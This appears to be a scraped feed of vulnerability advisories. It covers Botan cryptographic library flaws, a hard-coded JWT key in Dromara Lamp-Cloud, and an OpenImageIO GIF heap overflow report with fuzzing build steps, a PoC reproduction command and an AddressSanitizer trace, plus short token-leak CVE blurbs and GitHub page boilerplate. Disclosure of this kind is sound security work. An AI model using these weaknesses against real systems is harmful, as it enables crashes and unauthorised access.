    
    RFC 6125 also requires that when matching a X.509 certificate against a DNS name, the CN entry is only compared if no subjectAlternativeName entry is available. Previously X509\_Certificate::matches\_dns\_name would always check both names.
    
    Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.0, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7827): PKCS #1 v1.5 decoding was not constant time
    
    During RSA decryption, how long decoding of PKCS #1 v1.5 padding took was input dependent. If these differences could be measured by an attacker, it could be used to mount a Bleichenbacher million-message attack. PKCS #1 v1.5 decoding has been rewritten to use a sequence of operations which do not contain any input-dependent indexes or jumps. Notations for checking constant time blocks with ctgrind (https://github.com/agl/ctgrind) were added to PKCS #1 decoding among other areas. Found in a review by Sirrix AG and 3curity GmbH.
    
    Fixed in 1.11.22 and 1.10.13. Affected all previous versions.
    
*   2015-08-03 (CVE-2015-5726): Crash in BER decoder
    
    The BER decoder would crash due to reading from offset 0 of an empty vector if it encountered a BIT STRING which did not contain any data at all. This can be used to easily crash applications reading untrusted ASN.1 data, but does not seem exploitable for code execution. Found with afl.
    
    Fixed in 1.11.19 and 1.10.10, affected all previous versions of 1.10 and 1.11
    
*   2015-08-03 (CVE-2015-5727): Excess memory allocation in BER decoder
    
    The BER decoder would allocate a fairly arbitrary amount of memory in a length field, even if there was no chance the read request would succeed. This might cause the process to run out of memory or invoke the OOM killer. Found with afl.
    
    Fixed in 1.11.19 and 1.10.10, affected all previous versions of 1.10 and 1.11
    

**2014¶**

*   2014-04-10 (CVE-2014-9742): Insufficient randomness in Miller-Rabin primality check
    
    A bug in the Miller-Rabin primality test resulted in only a single random base being used instead of a sequence of such bases. This increased the probability that a non-prime would be accepted by is\_prime or that a randomly generated prime might actually be composite. The probability of a random 1024 bit number being incorrectly classed as prime with a single base is around 2^-40. Reported by Jeff Marrison.
    
    Introduced in 1.8.3, fixed in 1.10.8 and 1.11.9

CVE-2017-7252: Security Advisories — Botan

Dromara Lamp-Cloud before v3.8.1 was discovered to use a hardcoded cryptographic key when creating and verifying a Json Web Token. This vulnerability allows attackers to authenticate to the application via a crafted JWT token.

**Dromara Lamp-Cloud Use of Hard-coded Cryptographic Key**

High severity GitHub Reviewed Published Nov 3, 2023 to the GitHub Advisory Database • Updated Nov 3, 2023

GHSA-xr8c-mq5x-5f56: Dromara Lamp-Cloud Use of Hard-coded Cryptographic Key

Buffer Overflow vulnerability in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_subimage_data function.

Describe the bug:  
Hi, I found heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368.

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert poc /tmp/res

poc file:  
poc.zip

Evidence:  
\==1483==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a3f9 at pc 0x7f8fd7a5f640 bp 0x7ffd22f8daf0 sp 0x7ffd22f8dae8  
READ of size 1 at 0x60200000a3f9 thread T0  
#0 0x7f8fd7a5f63f in OpenImageIO\_v2\_4::GIFInput::read\_subimage\_data() /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:368:65  
#1 0x7f8fd7a57713 in OpenImageIO\_v2\_4::GIFInput::seek\_subimage(int, int) /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:449:10  
#2 0x7f8fd7a559af in OpenImageIO\_v2\_4::GIFInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_4::ImageSpec&) /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:165:9  
#3 0x7f8fd75febcf in OpenImageIO\_v2\_4::ImageInput::create(OpenImageIO\_v2\_4::basic\_string\_view<char, std::char\_traits >, bool, OpenImageIO\_v2\_4::ImageSpec const\*, OpenImageIO\_v2\_4::Filesystem::IOProxy\*, OpenImageIO\_v2\_4::basic\_string\_view<char, std::char\_traits >) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageioplugin.cpp:786:27  
#4 0x7f8fd7552674 in OpenImageIO\_v2\_4::ImageInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_4::ImageSpec const\*, OpenImageIO\_v2\_4::Filesystem::IOProxy\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:112:16  
#5 0x564781f3b48f in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:330:15  
#6 0x564781f4006f in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#7 0x7f8fd493fd8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#8 0x7f8fd493fe3f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#9 0x564781e7ac74 in \_start (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0x40c74) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad)

0x60200000a3f9 is located 3 bytes to the right of 6-byte region \[0x60200000a3f0,0x60200000a3f6)  
allocated by thread T0 here:  
#0 0x564781efdca8 in \_\_interceptor\_calloc (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0xc3ca8) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad)  
#1 0x7f8fd22f6b98 in GifMakeMapObject (/lib/x86\_64-linux-gnu/libgif.so.7+0x3b98) (BuildId: 1fff7899d615250f1b273a11e966d1347b233009)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:371:65 in OpenImageIO\_v2\_4::GIFInput::read\_subimage\_data()  
Shadow bytes around the buggy address:  
0x0c047fff9420: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9430: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9440: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9450: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fd  
0x0c047fff9460: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd  
\=>0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 06\[fa\]  
0x0c047fff9480: fa fa 04 fa fa fa 01 fa fa fa fa fa fa fa fa fa  
0x0c047fff9490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==1483==ABORTING

Platform information:  
OIIO branch/version: 2.4.11  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-42299: heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368 · Issue #3840 · AcademySoftwareFoundation/OpenImageIO

An information leak in hirochanKAKIwaiting v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39057: CVE-reports/CVE-2023-39057.md at main · syz913/CVE-reports

An information leak in Tokudaya.ekimae_mc v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

CVE-2023-39054: CVE-reports/CVE-2023-39054.md at main · syz913/CVE-reports

An information leak in VISION MEAT WORKS Track Diner 10/10mbl v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

CVE-2023-39051: CVE-reports/CVE-2023-39051.md at main · syz913/CVE-reports

An information leak in Gyouza-newhushimi v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

Tag

#git